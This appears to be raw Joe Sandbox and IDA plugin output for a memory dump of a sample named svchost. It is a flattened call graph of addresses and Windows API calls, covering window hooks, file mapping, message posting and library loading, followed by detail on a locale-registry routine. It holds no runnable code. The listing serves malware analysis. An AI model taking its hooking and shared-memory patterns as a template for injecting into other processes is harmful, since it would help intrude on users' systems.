RegCloseKey 7017->7019 5337 3e3b320 5344 3e34cdc 5337->5344 5345 3e34ce7 5344->5345 5386 3e339a4 5345->5386 5348 3e3b054 5349 3e3b07f 5348->5349 5350 3e3b18e 5348->5350 5351 3e3b1ca 5349->5351 5455 3e38214 GetModuleFileNameA 5349->5455 5352 3e3b1c5 5350->5352 5354 3e3b1a5 GetCurrentProcessId PostMessageA 5350->5354 5487 3e33cec 5351->5487 5486 3e39c48 UnmapViewOfFile CloseHandle 5352->5486 5354->5352 5360 3e3b09a 5462 3e39b94 5360->5462 5365 3e38ff0 4 API calls 5366 3e3b0f1 5365->5366 5367 3e38ff0 4 API calls 5366->5367 5368 3e3b100 5367->5368 5369 3e38ff0 4 API calls 5368->5369 5370 3e3b10f 5369->5370 5371 3e38ff0 4 API calls 5370->5371 5372 3e3b118 GetModuleHandleA 5371->5372 5479 3e38c9c IsBadReadPtr 5372->5479 5375 3e3b159 GetCurrentProcess 5483 3e3905c 5375->5483 5376 3e3b168 GetCurrentProcessId PostMessageA 5376->5351 5379 3e33bd0 5380 3e33be5 5379->5380 5381 3e33b44 5 API calls 5380->5381 5382 3e33c0e 5380->5382 5381->5382 5383 3e33c5a FreeLibrary 5382->5383 5384 3e33c7e ExitProcess 5382->5384 5383->5382 5387 3e339ea 5386->5387 5388 3e33a38 5387->5388 5401 3e3b054 32 API calls 5387->5401 5389 3e33a63 5388->5389 5390 3e33bd0 5388->5390 5402 3e33934 5389->5402 5393 3e33c15 5390->5393 5394 3e33c04 5390->5394 5397 3e33c5a FreeLibrary 5393->5397 5398 3e33c7e 5393->5398 5406 3e33b44 5394->5406 5396 3e33c0e 5396->5393 5397->5393 5399 3e33c87 5398->5399 5400 3e33c8d ExitProcess 5398->5400 5399->5400 5401->5388 5403 3e3397f 5402->5403 5404 3e33949 5402->5404 5403->5348 5404->5403 5412 3e34344 5404->5412 5407 3e33ba5 5406->5407 5408 3e33b4e GetStdHandle WriteFile GetStdHandle WriteFile 5406->5408 5409 3e33bc1 5407->5409 5410 3e33bae MessageBoxA 5407->5410 5408->5396 5409->5396 5410->5409 5413 3e34354 GetModuleFileNameA 5412->5413 5414 3e34370 5412->5414 5416 3e345d8 GetModuleFileNameA RegOpenKeyExA 5413->5416 5414->5404 5417 3e3465a 5416->5417 5418 3e3461a RegOpenKeyExA 5416->5418 5434 3e34400 GetModuleHandleA 5417->5434 5418->5417 5419 3e34638 RegOpenKeyExA 5418->5419 5419->5417 5421 3e346e3 lstrcpyn GetThreadLocale GetLocaleInfoA 5419->5421 5423 3e34813 5421->5423 5424 3e3471a 5421->5424 5423->5414 5424->5423 5427 3e3472a lstrlen 5424->5427 5425 3e346bd RegCloseKey 5425->5414 5426 3e3469f RegQueryValueExA 5426->5425 5429 3e34743 5427->5429 5429->5423 5430 3e34771 lstrcpyn LoadLibraryExA 5429->5430 5431 3e3479d 5429->5431 5430->5431 5431->5423 5432 3e347a7 lstrcpyn LoadLibraryExA 5431->5432 5432->5423 5433 3e347dd lstrcpyn LoadLibraryExA 5432->5433 5433->5423 5435 3e34428 GetProcAddress 5434->5435 5436 3e3446c 5434->5436 5435->5436 5437 3e3443c 5435->5437 5439 3e345a8 RegQueryValueExA 5436->5439 5448 3e344a4 5436->5448 5451 3e343d4 5436->5451 5437->5436 5441 3e34453 lstrcpyn 5437->5441 5438 3e344be lstrcpyn 5445 3e344dd 5438->5445 5439->5425 5439->5426 5441->5439 5442 3e34594 lstrcpyn 5442->5439 5444 3e343d4 CharNextA 5444->5445 5445->5439 5445->5442 5445->5444 5447 3e344ff lstrcpyn FindFirstFileA 5445->5447 5446 3e343d4 CharNextA 5446->5448 5447->5439 5449 3e3452d FindClose lstrlen 5447->5449 5448->5438 5448->5439 5449->5439 5450 3e3454c lstrcpyn lstrlen 5449->5450 5450->5445 5452 3e343eb 5451->5452 5453 3e343f8 5452->5453 5454 3e343e1 CharNextA 5452->5454 5453->5439 5453->5446 5454->5452 5491 3e33db8 5455->5491 5458 3e35eb0 5459 3e35ec3 5458->5459 5540 3e340c4 5459->5540 5463 3e39c37 5462->5463 5464 3e39ba5 5462->5464 5463->5351 5474 3e38ff0 5463->5474 5465 3e39baa OpenFileMappingA 5464->5465 5466 3e39bc2 5465->5466 5467 3e39bd6 5465->5467 5470 3e39bc7 OpenFileMappingA 5466->5470 5468 3e39beb MapViewOfFile 5467->5468 5469 3e39bdf GetLastError 5467->5469 5471 3e39c24 5468->5471 5472 3e39c0c MapViewOfFile 5468->5472 5469->5463 5470->5467 5471->5463 5473 3e39c2d GetLastError 5471->5473 5472->5471 5473->5463 5547 3e38c64 5474->5547 5477 3e3900c ChangeWindowMessageFilter 5478 3e39017 5477->5478 5478->5365 5480 3e38ce7 5479->5480 5481 3e38cb9 5479->5481 5480->5375 5480->5376 5481->5480 5482 3e38ccc IsBadReadPtr 5481->5482 5482->5480 5484 3e38c64 3 API calls 5483->5484 5485 3e39074 5484->5485 5485->5351 5485->5376 5486->5351 5488 3e33cf2 5487->5488 5489 3e33d18 5488->5489 5490 3e328c4 11 API calls 5488->5490 5489->5379 5490->5488 5496 3e33d8c 5491->5496 5493 3e33dc8 5501 3e33cc8 5493->5501 5497 3e33d90 5496->5497 5498 3e33db4 5496->5498 5505 3e32894 5497->5505 5498->5493 5502 3e33cce 5501->5502 5504 3e33ce9 5501->5504 5502->5504 5536 3e328c4 5502->5536 5504->5458 5506 3e328b4 5505->5506 5507 3e3289c 5505->5507 5506->5493 5507->5506 5509 3e329b8 5507->5509 5510 3e3296c 5509->5510 5512 3e32991 5510->5512 5515 3e34c90 5510->5515 5523 3e32960 5512->5523 5516 3e34cc5 TlsGetValue 5515->5516 5517 3e34c9f 5515->5517 5518 3e34caa 5516->5518 5519 3e34ccf 5516->5519 5517->5512 5526 3e34bd4 5518->5526 5519->5512 5521 3e34caf TlsGetValue 5522 3e34cbe 5521->5522 5522->5512 5533 3e33cb0 5523->5533 5527 3e34bda 5526->5527 5531 3e34bfe 5527->5531 5532 3e34bc0 LocalAlloc 5527->5532 5529 3e34bfa 5530 3e34c0a TlsSetValue 5529->5530 5529->5531 5530->5531 5531->5521 5532->5529 5534 3e33bd0 7 API calls 5533->5534 5535 3e3296b 5534->5535 5535->5506 5537 3e328c9 5536->5537 5538 3e328dc 5536->5538 5537->5538 5539 3e329b8 11 API calls 5537->5539 5538->5504 5539->5538 5541 3e340f6 5540->5541 5542 3e340c9 5540->5542 5543 3e33cc8 11 API calls 5541->5543 5542->5541 5545 3e340dd 5542->5545 5544 3e340ec 5543->5544 5544->5360 5546 3e33db8 11 API calls 5545->5546 5546->5544 5548 3e38c8b 5547->5548 5549 3e38c7b 5547->5549 5548->5477 5548->5478 5552 3e38c08 5549->5552 5560 3e340b8 5552->5560 5555 3e38c41 5557 3e38c5c 5555->5557 5559 3e38c4f GetProcAddress 5555->5559 5556 3e38c30 5558 3e38c38 LoadLibraryA 5556->5558 5557->5548 5558->5555 5559->5557 5561 3e340bc GetModuleHandleA 5560->5561 5561->5555 5561->5556 7025 3e36426 7027 3e36428 7025->7027 7026 3e36458 7027->7026 7028 3e360b0 42 API calls 7027->7028 7028->7026 6063 3e3872a 6064 3e3872c 6063->6064 6065 3e38786 6064->6065 6077 3e33a6c 6064->6077 6067 3e38750 6068 3e38772 6067->6068 6069 3e33d1c 11 API calls 6067->6069 6081 3e37924 6068->6081 6069->6068 6073 3e3877c 6088 3e38270 GetModuleHandleA 6073->6088 6078 3e33a78 6077->6078 6079 3e3499c 42 API calls 6078->6079 6080 3e33a8d 6078->6080 6079->6078 6080->6067 6161 3e3731c 6081->6161 6083 3e37936 6084 3e3731c 42 API calls 6083->6084 6085 3e3794d 6084->6085 6086 3e37a28 GetVersionExA 6085->6086 6087 3e37a3f 6086->6087 6087->6073 6089 3e38281 GetProcAddress 6088->6089 6090 3e38291 6088->6090 6089->6090 6091 3e37e9c 6090->6091 6092 3e37ea4 6091->6092 6092->6092 6165 3e37d24 GetThreadLocale 6092->6165 6097 3e37ed2 GetThreadLocale 6194 3e36a94 GetLocaleInfoA 6097->6194 6101 3e33d1c 11 API calls 6102 3e37ef8 6101->6102 6103 3e36a94 12 API calls 6102->6103 6104 3e37f0d 6103->6104 6105 3e36a94 12 API calls 6104->6105 6106 3e37f31 6105->6106 6200 3e36ae0 GetLocaleInfoA 6106->6200 6109 3e36ae0 GetLocaleInfoA 6110 3e37f61 6109->6110 6111 3e36a94 12 API calls 6110->6111 6112 3e37f7b 6111->6112 6113 3e36ae0 GetLocaleInfoA 6112->6113 6114 3e37f98 6113->6114 6115 3e36a94 12 API calls 6114->6115 6116 3e37fb2 6115->6116 6117 3e33d1c 11 API calls 6116->6117 6118 3e37fca 6117->6118 6119 3e36a94 12 API calls 6118->6119 6120 3e37fdf 6119->6120 6121 3e33d1c 11 API calls 6120->6121 6122 3e37ff7 6121->6122 6123 3e36ae0 GetLocaleInfoA 6122->6123 6124 3e38005 6123->6124 6125 3e36a94 12 API calls 6124->6125 6126 3e3801f 6125->6126 6127 3e33d1c 11 API calls 6126->6127 6128 3e3802c 6127->6128 6129 3e36a94 12 API calls 6128->6129 6130 3e38041 6129->6130 6131 3e33d1c 11 API calls 6130->6131 6132 3e3804e 6131->6132 6133 3e33cc8 11 API calls 6132->6133 6134 3e38056 6133->6134 6135 3e33cc8 11 API calls 6134->6135 6136 3e3805e 6135->6136 6137 3e36a94 12 API calls 6136->6137 6138 3e38073 6137->6138 6139 3e38081 6138->6139 6140 3e38090 6138->6140 6202 3e33d60 6139->6202 6142 3e33d60 11 API calls 6140->6142 6143 3e3808e 6142->6143 6144 3e36a94 12 API calls 6143->6144 6145 3e380b2 6144->6145 6146 3e380f0 6145->6146 6148 3e36a94 12 API calls 6145->6148 6206 3e33f88 6146->6206 6150 3e380d5 6148->6150 6154 3e380e3 6150->6154 6155 3e380f2 6150->6155 6158 3e33d60 11 API calls 6154->6158 6156 3e33d60 11 API calls 6155->6156 6156->6146 6158->6146 6162 3e37323 6161->6162 6163 3e3499c 42 API calls 6162->6163 6164 3e3733b 6163->6164 6164->6083 6166 3e37d57 6165->6166 6167 3e37e47 GetSystemMetrics GetSystemMetrics 6166->6167 6171 3e37d9a 6166->6171 6168 3e37da3 6167->6168 6169 3e37e6e 6167->6169 6175 3e36b44 GetThreadLocale 6168->6175 6170 3e37cac 14 API calls 6169->6170 6170->6168 6171->6168 6215 3e37cac 6171->6215 6178 3e36b77 6175->6178 6176 3e36b08 43 API calls 6176->6178 6177 3e33d1c 11 API calls 6177->6178 6178->6176 6178->6177 6180 3e36bc9 6178->6180 6179 3e36b08 43 API calls 6179->6180 6180->6179 6181 3e33d1c 11 API calls 6180->6181 6182 3e36c3c 6180->6182 6181->6180 6183 3e33cec 11 API calls 6182->6183 6184 3e36c56 6183->6184 6184->6097 6185 3e36d1c GetThreadLocale 6184->6185 6186 3e36a94 12 API calls 6185->6186 6187 3e36d48 6186->6187 6188 3e36d61 GetThreadLocale EnumCalendarInfoA 6187->6188 6190 3e36d9d 6187->6190 6189 3e36d7e 6188->6189 6189->6189 6191 3e36d8a GetThreadLocale EnumCalendarInfoA 6189->6191 6192 3e33cc8 11 API calls 6190->6192 6191->6190 6193 3e36db2 6192->6193 6193->6097 6195 3e36abb 6194->6195 6196 3e36acd 6194->6196 6197 3e33db8 11 API calls 6195->6197 6198 3e33d1c 11 API calls 6196->6198 6199 3e36acb 6197->6199 6198->6199 6199->6101 6201 3e36afc 6200->6201 6201->6109 6204 3e33d64 6202->6204 6203 3e33d88 6203->6143 6204->6203 6205 3e328c4 11 API calls 6204->6205 6205->6203 6207 3e33f99 6206->6207 6208 3e33fd6 6207->6208 6209 3e33fbf 6207->6209 6211 3e33d8c 11 API calls 6208->6211 6210 3e34104 11 API calls 6209->6210 6213 3e33fcc 6210->6213 6211->6213 6212 3e34007 6213->6212 6214 3e33d1c 11 API calls 6213->6214 6214->6212 6219 3e37c38 GetLocaleInfoA 6215->6219 6225 3e33f10 6219->6225 6226 3e33f1b 6225->6226 6227 3e3872c 6228 3e38786 6227->6228 6229 3e38746 6227->6229 6230 3e33a6c 42 API calls 6229->6230 6231 3e38750 6230->6231 6232 3e38772 6231->6232 6233 3e33d1c 11 API calls 6231->6233 6234 3e37924 42 API calls 6232->6234 6233->6232 6235 3e38777 6234->6235 6236 3e37a28 GetVersionExA 6235->6236 6237 3e3877c 6236->6237 6238 3e38270 2 API calls 6237->6238 6239 3e38781 6238->6239 6240 3e37e9c 58 API calls 6239->6240 6240->6228 6381 3e3aa30 6382 3e3aa43 CallNextHookEx 6381->6382 6383 3e3aa64 CallNextHookEx 6381->6383 6385 3e3aa7a 6382->6385 6383->6385 6384 3e3ab00 6385->6384 6386 3e399e0 4 API calls 6385->6386 6387 3e3aabc 6386->6387 6387->6384 6397 3e3a36c 6387->6397 6389 3e3ab05 6390 3e39dc8 7 API calls 6389->6390 6390->6384 6392 3e3aafb 6392->6384 6393 3e3ab7a 6392->6393 6394 3e3ab47 6392->6394 6395 3e39dc8 7 API calls 6393->6395 6396 3e39d40 6 API calls 6394->6396 6395->6384 6396->6384 6398 3e3a38b GetCurrentProcess SetProcessWorkingSetSize 6397->6398 6399 3e3a39f 6397->6399 6414 3e3a3b6 6398->6414 6400 3e3a3bb 6399->6400 6401 3e3a3ae 6399->6401 6403 3e3a3d4 6400->6403 6404 3e3a3ca 6400->6404 6415 3e3a520 GetWindowRect 6401->6415 6406 3e3a403 RegisterClipboardFormatA 6403->6406 6407 3e3a3e3 6403->6407 6423 3e3a5a0 6404->6423 6409 3e3a412 6406->6409 6410 3e3a41e RegisterClipboardFormatA 6406->6410 6408 3e39dc8 7 API calls 6407->6408 6408->6414 6426 3e3a31c 6409->6426 6412 3e3a42d 6410->6412 6410->6414 6413 3e3a31c 3 API calls 6412->6413 6413->6414 6414->6384 6414->6389 6414->6392 6430 3e3a45c GetWindowInfo 6415->6430 6419 3e3a549 SetWindowPos 6420 3e3a586 6419->6420 6439 3e3a500 SetWindowLongA 6420->6439 6422 3e3a591 6422->6414 6441 3e38904 GetForegroundWindow GetWindowThreadProcessId GetCurrentThreadId AttachThreadInput SetFocus 6423->6441 6425 3e3a5af SetWindowPos 6425->6414 6428 3e3a32d 6426->6428 6427 3e3a356 6427->6414 6428->6427 6443 3e3a2b4 6428->6443 6431 3e3a476 6430->6431 6432 3e3a47e GetSystemMetrics 6430->6432 6440 3e388dc GetWindowLongA 6431->6440 6432->6431 6434 3e3a495 6435 3e3a4a5 GetSystemMetrics 6434->6435 6436 3e3a499 GetSystemMetrics 6434->6436 6437 3e3a4af 6435->6437 6436->6437 6438 3e3a4dc SetWindowLongA 6437->6438 6438->6419 6439->6422 6440->6434 6442 3e38958 GetCurrentThreadId AttachThreadInput 6441->6442 6442->6425 6444 3e38c64 3 API calls 6443->6444 6445 3e3a2cc 6444->6445 6445->6427 6446 3e39634 6447 3e33cc8 11 API calls 6446->6447 6448 3e39648 6447->6448 6745 3e3853b 6746 3e38544 6745->6746 6747 3e3850a 6746->6747 6748 3e38244 11 API calls 6746->6748 6749 3e385d8 6748->6749 6750 3e341f0 13 API calls 6749->6750 6751 3e385f2 6750->6751 6752 3e341f0 13 API calls 6751->6752 6753 3e38607 6752->6753 6754 3e341f0 13 API calls 6753->6754 6755 3e3861c 6754->6755 6756 3e33cc8 11 API calls 6755->6756 6757 3e38626 6756->6757 6758 3e34308 13 API calls 6757->6758 6759 3e38636 6758->6759 6760 3e34308 13 API calls 6759->6760 6761 3e38646 6760->6761 6762 3e341f0 13 API calls 6761->6762 6763 3e3865b 6762->6763 6764 3e341f0 13 API calls 6763->6764 6765 3e38670 6764->6765 6766 3e341f0 13 API calls 6765->6766 6767 3e38685 6766->6767 6768 3e341f0 13 API calls 6767->6768 6769 3e3869a 6768->6769 6770 3e341f0 13 API calls 6769->6770 6771 3e386af 6770->6771 6772 3e33cc8 11 API calls 6771->6772 6773 3e386b9 6772->6773 6774 3e33cc8 11 API calls 6773->6774 6775 3e386c3 6774->6775 6776 3e33cc8 11 API calls 6775->6776 6777 3e386cd 6776->6777 6778 3e33cc8 11 API calls 6777->6778 6779 3e386d7 6778->6779 6780 3e33cc8 11 API calls 6779->6780 6781 3e386e1 6780->6781 6782 3e33cc8 11 API calls 6781->6782 6783 3e386eb 6782->6783 6784 3e33cc8 11 API calls 6783->6784 6785 3e386f5 6784->6785 6786 3e33cc8 11 API calls 6785->6786 6787 3e386ff 6786->6787 6788 3e34168 SysFreeString 6787->6788 6789 3e38709 6788->6789 6790 3e33cc8 11 API calls 6789->6790 6790->6747 6241 3e3373a 6242 3e3373c 6241->6242 6243 3e32960 7 API calls 6242->6243 6244 3e337d8 6243->6244 7034 3e3a03a 7035 3e3a03d 7034->7035 7036 3e32934 4 API calls 7035->7036 7037 3e3a046 7036->7037 7038 3e39e3c 6 API calls 7037->7038 7039 3e3a04e 7038->7039 7040 3e3a053 7039->7040 7041 3e336f4 4 API calls 7039->7041 7041->7040 6449 3e3323e 6450 3e33249 6449->6450 6453 3e336a0 6450->6453 6452 3e3325c 6454 3e34c90 4 API calls 6453->6454 6455 3e336b0 6454->6455 6455->6452 7042 3e3783c 7043 3e37813 7042->7043 7044 3e33cc8 11 API calls 7043->7044 7045 3e3781e 7044->7045 7046 3e33cec 11 API calls 7045->7046 7047 3e3782e 7046->7047 7048 3e33cc8 11 API calls 7047->7048 7049 3e37836 7048->7049 6456 3e3a600 6457 3e3a647 CallNextHookEx 6456->6457 6458 3e3a626 CallNextHookEx 6456->6458 6459 3e3a65d 6457->6459 6458->6459 6460 3e3a6f0 6459->6460 6461 3e399e0 4 API calls 6459->6461 6462 3e33cc8 11 API calls 6460->6462 6463 3e3a688 6461->6463 6464 3e3a937 6462->6464 6463->6460 6465 3e3a36c 31 API calls 6463->6465 6466 3e3a6a7 6465->6466 6466->6460 6467 3e3a6af GetWindowLongA 6466->6467 6467->6460 6468 3e3a6cd 6467->6468 6469 3e3a6f5 6468->6469 6470 3e3a6da 6468->6470 6471 3e3a6e1 6469->6471 6472 3e3a6fc 6469->6472 6470->6471 6473 3e3a754 6470->6473 6471->6460 6497 3e39a08 6471->6497 6474 3e3a7b2 6472->6474 6475 3e3a705 6472->6475 6473->6460 6500 3e39a3c 6473->6500 6477 3e3a801 6474->6477 6481 3e3a7cd 6474->6481 6475->6460 6482 3e3a8a5 GetSystemMenu 6475->6482 6489 3e3a8c6 6475->6489 6479 3e39dc8 7 API calls 6477->6479 6492 3e3a7f0 6479->6492 6484 3e39d40 6 API calls 6481->6484 6483 3e3a8bb 6482->6483 6482->6489 6511 3e39ae0 6483->6511 6484->6492 6485 3e39dc8 7 API calls 6485->6460 6488 3e39d40 6 API calls 6488->6460 6489->6460 6489->6488 6490 3e39a08 GetWindowLongA 6491 3e3a77f 6490->6491 6491->6460 6493 3e39dc8 7 API calls 6491->6493 6492->6460 6505 3e38840 6492->6505 6493->6460 6495 3e3a862 6495->6460 6496 3e3a875 PostMessageA 6495->6496 6496->6460 6498 3e39a32 6497->6498 6499 3e39a1e GetWindowLongA 6497->6499 6498->6460 6498->6485 6499->6498 6514 3e3889c 6500->6514 6503 3e39a8e CompareStringA 6504 3e39ab1 6503->6504 6504->6460 6504->6490 6506 3e34104 11 API calls 6505->6506 6507 3e38859 6506->6507 6508 3e38868 GetClassNameA 6507->6508 6509 3e34104 11 API calls 6508->6509 6510 3e3887c 6509->6510 6510->6495 6521 3e38b1c GetMenuItemCount 6511->6521 6515 3e388aa 6514->6515 6516 3e388c7 GetAncestor 6515->6516 6517 3e388ae 6515->6517 6519 3e388c5 GetClassNameA CompareStringA 6516->6519 6517->6519 6520 3e38880 GetParent 6517->6520 6519->6503 6519->6504 6520->6517 6525 3e38b56 6521->6525 6526 3e38b7c 6521->6526 6522 3e33cc8 11 API calls 6524 3e38ba1 6522->6524 6524->6489 6525->6526 6527 3e38bb0 GetMenuStringA 6525->6527 6526->6522 6528 3e38c01 6527->6528 6528->6525 6529 3e32e00 6530 3e32e7a 6529->6530 6531 3e32e47 6530->6531 6532 3e32f64 GetKeyboardType 6530->6532 6249 3e39304 6250 3e39310 7 API calls 6249->6250 6251 3e39379 6249->6251 6250->6251 6795 3e3a909 6796 3e3a90c 6795->6796 6797 3e32934 4 API calls 6796->6797 6798 3e3a915 6797->6798 6799 3e39e3c 6 API calls 6798->6799 6800 3e3a91d 6799->6800 6801 3e3a922 6800->6801 6802 3e336f4 4 API calls 6800->6802 6803 3e33cc8 11 API calls 6801->6803 6802->6801 6804 3e3a937 6803->6804 6533 3e33e08 6534 3e33e21 6533->6534 6535 3e33e2a 6533->6535 6536 3e33cc8 11 API calls 6534->6536 6537 3e33e5d 6535->6537 6548 3e33de8 WideCharToMultiByte 6535->6548 6539 3e33e28 6536->6539 6538 3e34104 11 API calls 6537->6538 6542 3e33e6a 6538->6542 6541 3e33e48 6541->6537 6543 3e33e4e 6541->6543 6549 3e33de8 WideCharToMultiByte 6542->6549 6545 3e33db8 11 API calls 6543->6545 6545->6539 6546 3e33e78 6547 3e34104 11 API calls 6546->6547 6547->6539 6548->6541 6549->6546 5742 3e39f0c 5743 3e39f40 CallNextHookEx 5742->5743 5744 3e39f1f CallNextHookEx 5742->5744 5745 3e39f56 5743->5745 5744->5745 5755 3e39fc4 5745->5755 5756 3e399e0 5745->5756 5748 3e39f96 5751 3e3a006 5748->5751 5752 3e39f9b 5748->5752 5749 3e39fd4 5750 3e39d40 6 API calls 5749->5750 5750->5755 5760 3e39dc8 5751->5760 5752->5755 5767 3e39d40 5752->5767 5757 3e399fc 5756->5757 5758 3e399f1 GetCurrentProcess 5756->5758 5757->5748 5757->5749 5757->5755 5759 3e3905c 3 API calls 5758->5759 5759->5757 5772 3e39c74 5760->5772 5763 3e39e18 5763->5755 5764 3e39def PostMessageA 5764->5763 5765 3e39e0e 5764->5765 5783 3e39e3c 5765->5783 5768 3e39c74 4 API calls 5767->5768 5770 3e39d63 5768->5770 5769 3e39d90 5769->5755 5770->5769 5771 3e39e3c 6 API calls 5770->5771 5771->5769 5773 3e39c90 5772->5773 5780 3e39d01 5772->5780 5774 3e39cc6 5773->5774 5775 3e39c99 5773->5775 5778 3e39ccf LoadLibraryA 5774->5778 5779 3e39cde 5774->5779 5776 3e39ca2 LoadLibraryA 5775->5776 5777 3e39cb1 GetProcAddress 5775->5777 5776->5777 5777->5774 5778->5779 5779->5780 5781 3e39ce7 5779->5781 5780->5763 5780->5764 5782 3e39cef GetProcAddress 5781->5782 5782->5780 5784 3e39c74 4 API calls 5783->5784 5785 3e39e52 5784->5785 5786 3e39e80 5785->5786 5787 3e39e5f GetCurrentProcessId PostMessageA 5785->5787 5786->5763 5787->5786 7050 3e33012 7051 3e33003 RegCloseKey 7050->7051 6813 3e37914 6818 3e37198 6813->6818 6816 3e33cb0 7 API calls 6817 3e37923 6816->6817 6832 3e37000 VirtualQuery 6818->6832 6820 3e371ac 6821 3e371b6 6820->6821 6822 3e37214 6820->6822 6841 3e32a9c 6821->6841 6824 3e3438c 30 API calls 6822->6824 6826 3e3722e LoadStringA MessageBoxA 6824->6826 6828 3e3724a 6826->6828 6828->6816 6831 3e371e4 GetStdHandle WriteFile GetStdHandle WriteFile 6831->6828 6833 3e37049 GetModuleFileNameA 6832->6833 6834 3e3702d GetModuleFileNameA 6832->6834 6836 3e37067 6833->6836 6834->6833 6834->6836 6835 3e3438c 30 API calls 6837 3e370fe LoadStringA 6835->6837 6836->6835 6838 3e37111 6837->6838 6839 3e36428 42 API calls 6838->6839 6840 3e37180 6839->6840 6840->6820 6848 3e32a54 6841->6848 6844 3e329c4 6845 3e34c90 4 API calls 6844->6845 6846 3e329cc CharToOemA 6845->6846 6847 3e35f68 6846->6847 6847->6831 6849 3e32a60 6848->6849 6850 3e32a95 6849->6850 6851 3e329e4 4 API calls 6849->6851 6850->6844 6851->6850 7052 3e34c18 7053 3e34c21 TlsAlloc 7052->7053 7054 3e34c40 7052->7054 7055 3e34bd4 2 API calls 7053->7055 7056 3e34c30 TlsGetValue 7055->7056 7056->7054 6852 3e3391e 6853 3e33923 6852->6853 6854 3e336a0 4 API calls 6853->6854 6855 3e33928 6854->6855 6856 3e336f4 4 API calls 6855->6856 6857 3e3392d 6856->6857

                                                                                                                                                                    Executed Functions

                                                                                                                                                                    Function 03E345D8 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 186registrystringlibraryCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 03E345F3
                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03E34611
                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03E3462F
                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 03E3464D
                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,03E346DC,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 03E34696
                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,03E34858,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,03E346DC,?,80000001), ref: 03E346B4
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,03E346E3,00000000,00000000,00000005,00000000,03E346DC,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03E346D6
                                                                                                                                                                    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 03E346F3
                                                                                                                                                                    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 03E34700
                                                                                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 03E34706
                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 03E34731
                                                                                                                                                                    • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 03E34786
                                                                                                                                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 03E34796
                                                                                                                                                                    • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 03E347C2
                                                                                                                                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 03E347D2
                                                                                                                                                                    • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 03E347FC
                                                                                                                                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 03E3480C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002A.00000002.20538811069.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002A.00000002.20538750796.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538871728.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538938090.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_42_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                    • API String ID: 1759228003-2375825460
                                                                                                                                                                    • Opcode ID: 7e7440d5d5907441c441d2cd60541d11d4953eaf70a1a0e47eed3776761da186
                                                                                                                                                                    • Instruction ID: 027d7748506c5a87c4e243fd0419d3990cb98108b6fbf369a26e7d6e62afc838
                                                                                                                                                                    • Opcode Fuzzy Hash: 7e7440d5d5907441c441d2cd60541d11d4953eaf70a1a0e47eed3776761da186
                                                                                                                                                                    • Instruction Fuzzy Hash: FB617175E4034D7EEB20EAE5CC49FEFB7BCDB0A704F4452A5A604E6181DAB49A44CF60
                                                                                                                                                                    Function 03E3B054 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 125windowCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000,0000004A,00000001,0000C209,00000001,0000C208,00000001,0000C20A,00000001,0000C207,00000001,00000000,03E3B1E5), ref: 03E3B11A
                                                                                                                                                                      • Part of subcall function 03E38C9C: IsBadReadPtr.KERNEL32(?,00000040), ref: 03E38CB0
                                                                                                                                                                      • Part of subcall function 03E38C9C: IsBadReadPtr.KERNEL32(03E3B1E5,00000004), ref: 03E38CDE
